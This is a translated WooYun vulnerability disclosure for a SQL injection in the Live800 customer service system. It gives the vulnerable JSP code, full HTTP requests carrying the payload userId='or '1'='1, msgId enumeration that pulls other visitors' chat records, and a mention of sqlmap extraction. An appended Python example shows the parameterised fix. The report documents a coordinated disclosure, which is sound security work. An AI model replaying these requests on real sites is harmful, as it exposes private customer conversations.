
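Vulnerability summary

Bug ID: wooyun-2016-0177533

Vulnerability title: Live800 online customer service system SQL injection / unauthorized viewing of conversation records

Vendor: live800.com

Author: applychen

Submitted: 2016-02-21 22:49

Fixed: 2016-05-22 11:40

Published: 2016-05-22 11:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org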



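Vulnerability details

Disclosure status:

2016-02-21: Details sent to the vendor; awaiting vendor handling
2016-02-22: Vendor confirmed; details disclosed to the vendor only
2016-02-25: Details opened to third-party security partners (绿盟科技, 唐朝安全巡航, 无声信息)
2016-04-17: Details disclosed to core white hats and experts in related fields
2016-04-27: Details disclosed to regular white hats
2016-05-07: Details disclosed to intern white hats
2016-05-22: Details disclosed to the public

Brief description:

The SQL injection affects many major sites, and conversation records can be viewed.

Detailed description:

The SQL injection is in the userId parameter of chatListForVisitor.jsp: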

// All three values come straight from the request.
String companyId = request.getParameter("companyId");
String userId = request.getParameter("userId");
String sId = request.getParameter("sId");
try {
    // Error strings: "错误请求" = "bad request", "非法请求" = "illegal request".
    if (StringUtils.isNullOrLengthZero(new String[]{companyId, userId, sId})) {
        out.println("<p align='center'><font color='red'>错误请求</font></p>");
        return;
    }
    // Condition 1: the sId parameter must equal the session id.
    if (!sId.equals(session.getId())) {
        out.println("<p align='center'><font color='red'>非法请求</font></p>");
        return;
    }
    // Condition 2: the session must carry a hasLogin attribute.
    if (session.getAttribute("hasLogin") == null) {
        out.println("<p align='center'><font color='red'>非法请求</font></p>");
        return;
    }
} catch (Exception e) {
    out.println("<p align='center'><font color='red'>非法请求</font></p>");
    return;
}
// Query window: from 30 days ago (held in "yesterday") up to today.
java.text.SimpleDateFormat formatter = new java.text.SimpleDateFormat(
        "yyyy-MM-dd");
GregorianCalendar day = new GregorianCalendar();
Date today = day.getTime();
String todayStr = formatter.format(today);
day.add(GregorianCalendar.DATE, -30);
Date yesterday = day.getTime();
String yesterdayStr = formatter.format(yesterday);
Map<String,String> speParaMap = new HashMap<String,String>();
String fromTime = yesterdayStr + " 00:00:00";
String toTime = todayStr + " 23:59:59";
// userId is only checked for null/empty above before it is handed to the query.
speParaMap.put("companyId", companyId);
speParaMap.put("userId", userId);
speParaMap.put("fromTime", fromTime);
speParaMap.put("toTime", toTime);
pageContext.setAttribute("companyId", companyId);
boolean res = ValueListUtil.setValueList(speParaMap, pageContext,
        "chatInfoAdapter_chatQuery_for_visitor", "list");
if (!res) {
    request.setAttribute("list", new DefaultListBackedValueList(
            null, null));
}


To reach this file successfully, the following two conditions must be met:

if (!sId.equals(session.getId())) {
    out.println("<p align='center'><font color='red'>非法请求</font></p>");
    return;
}
if (session.getAttribute("hasLogin") == null) {
    out.println("<p align='center'><font color='red'>非法请求</font></p>");
    return;
}


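First, sId must equal the session ID; second, hasLogin in the session must not be null.
The first condition was described in the previous report, http://**.**.**.**/bugs/wooyun-2016-0177183, and is not repeated here.
For the second condition, chatbox.jsp sets hasLogin to 1: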

// In the 韦博英语 case, the page is reloaded after a region is selected and the referer can no longer be obtained, so set a marker.
session.setAttribute("hasLogin","1");
CompanyInfo companyInfo = DBManager.getValidCompanyInfo(companyId);


To exploit this, first request chatbox.jsp so that hasLogin is written into the session, then note the JSESSIONID:

GET /live800/chatClient/chatbox.jsp?companyID=1&configID=10&skillId=17&enterurl=http%3A%2F%2F**.**.**.**%2Findex.html&k=1&remark= HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive


[Screenshot: 1.png]


Then use the JSESSIONID just recorded to construct the following request [Marker 1]:

POST /live800/chatListForVisitor.jsp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=AA2AC6B345DC64287B69997954DE91A4
Connection: keep-alive
Content-Length: 60

companyId=8922&userId=1&sId=AA2AC6B345DC64287B69997954DE91A4


When userId='or '1'='1, the conversation records can be viewed:

POST /live800/chatListForVisitor.jsp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=AA2AC6B345DC64287B69997954DE91A4
Connection: keep-alive
Content-Length: 60

companyId=8922&userId='or '1'='1&sId=AA2AC6B345DC64287B69997954DE91A4


[Screenshot: 2.png]


The following request retrieves a chat record:

GET /live800/chatDetail_brief_show_for_visitor.jsp?companyId=8922&msgId=3841000 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/live800/chatListForVisitor.jsp
Cookie: JSESSIONID=AA2AC6B345DC64287B69997954DE91A4
Connection: close


[Screenshot: 3.png]


Iterating over the msgId parameter returns a large number of chat records:

[Screenshot: 4.png]


Running the [Marker 1] request through SQLMAP extracts data:

[Screenshot: 5.png]


Logging in to the admin back end to view the data (http://**.**.**.**/bugs/wooyun-2015-0147511):

[Screenshot: 6.png]


[Screenshot: 7.png]


A partial list of affected sites:



Proof of vulnerability:

Same as above.

Fix:

Configure a filter that globally filters request input.
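The userId behaviour described in the report next to a parameterised form of the same query, as an added example that is not part of the original report and is not Live800's code. The table, column names and rows are constructed, Python with an in-memory SQLite database stands in for the JSP and its database, and chat_detail assumes the server keeps the visitor's id in the session.

```python
import sqlite3

def make_db():
    """Constructed schema and rows; the report does not show the real tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE chat_info (msg_id INTEGER PRIMARY KEY, "
               "company_id TEXT, user_id TEXT, body TEXT)")
    db.executemany("INSERT INTO chat_info VALUES (?, ?, ?, ?)", [
        (3841000, "8922", "visitor-a", "order question"),
        (3841001, "8922", "visitor-b", "refund request"),
        (3841002, "8922", "visitor-c", "account problem"),
    ])
    return db

def list_chats_concat(db, company_id, user_id):
    """Assumed vulnerable form: request values are pasted into the SQL text."""
    sql = ("SELECT msg_id FROM chat_info WHERE company_id = '" + company_id +
           "' AND user_id = '" + user_id + "' ORDER BY msg_id")
    return [row[0] for row in db.execute(sql)]

def list_chats_bound(db, company_id, user_id):
    """Hardened form: bound parameters keep the input as data, never as SQL."""
    sql = ("SELECT msg_id FROM chat_info "
           "WHERE company_id = ? AND user_id = ? ORDER BY msg_id")
    return [row[0] for row in db.execute(sql, (company_id, user_id))]

def chat_detail(db, session_user_id, company_id, msg_id):
    """Detail lookup scoped to the visitor id held in the server-side session
    (an assumption), so stepping through msgId values yields no foreign chats."""
    row = db.execute(
        "SELECT body FROM chat_info "
        "WHERE msg_id = ? AND company_id = ? AND user_id = ?",
        (int(msg_id), company_id, session_user_id)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    quoted = "'or '1'='1"  # the userId value quoted in the report
    print("concatenated:", list_chats_concat(db, "8922", quoted))
    print("bound:       ", list_chats_bound(db, "8922", quoted))
    print("own chat:    ", chat_detail(db, "visitor-a", "8922", 3841000))
    print("other's chat:", chat_detail(db, "visitor-a", "8922", 3841001))
```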

Copyright notice: please credit the source when reposting: applychen@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-02-22 11:31

Vendor reply:

Thank you very much.

Latest status:

None